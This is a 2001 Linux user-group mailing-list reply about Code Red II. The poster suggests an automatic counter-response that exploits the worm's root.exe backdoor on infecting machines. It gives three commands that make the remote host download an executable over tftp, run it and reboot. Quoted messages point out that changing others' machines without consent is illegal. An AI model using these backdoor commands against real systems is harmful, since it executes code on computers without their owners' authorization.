Actually, since code red II installs a backdoor, you could have an autoresponder script that gets run against the ip of the machine hitting default.ida on your webserver. Something like (friggin outlook capitalizes all of the following lines): Lynx -source http://infectedhost/scripts/root.exe+/c+tftp+-i+tftpserver.yourdomain.com+GE T+iispatch.exe+c:\iispatch.exe > /dev/null Lynx -source http://infectedhost/scripts/root.exe+/c+c:\iispatch.exe > /dev/null Lynx -source http://infectedhost/scripts/root.exe+/c+reboot Or something similar. You'd probably need something in there to remove the worm also, because the patch won't remove the worm from the system. > -----Original Message----- > From: joel at luths.net [mailto:joel at luths.net] > Sent: Tuesday, August 07, 2001 1:10 PM > To: tclug-list at mn-linux.org > Subject: Re: [TCLUG] Code Red Auto Fix > > > Seems like webmaster at domain is often a black hole anyway. > Anyone who still has > an unpatched IIS is unlikely to have set up a proper > webmaster mail account. > > Quoting Yaron <jethro at freakzilla.com>: > > > Hi, > > > > On Tue, 7 Aug 2001, Spencer J Sinn wrote: > > > > > Making changes or modifications to anyones machine without their > > express > > > consent is illegal. Setting up an auto-mailer to contact the > > > webmaster is not a bad idea. > > > > Except a lot of these are dorky kids running NT with no > mail support. > > > > > > -Yaron > > > _______________________________________________ > tclug-list mailing list > tclug-list at mn-linux.org > https://mailman.mn-> linux.org/mailman/listinfo/tclug-list >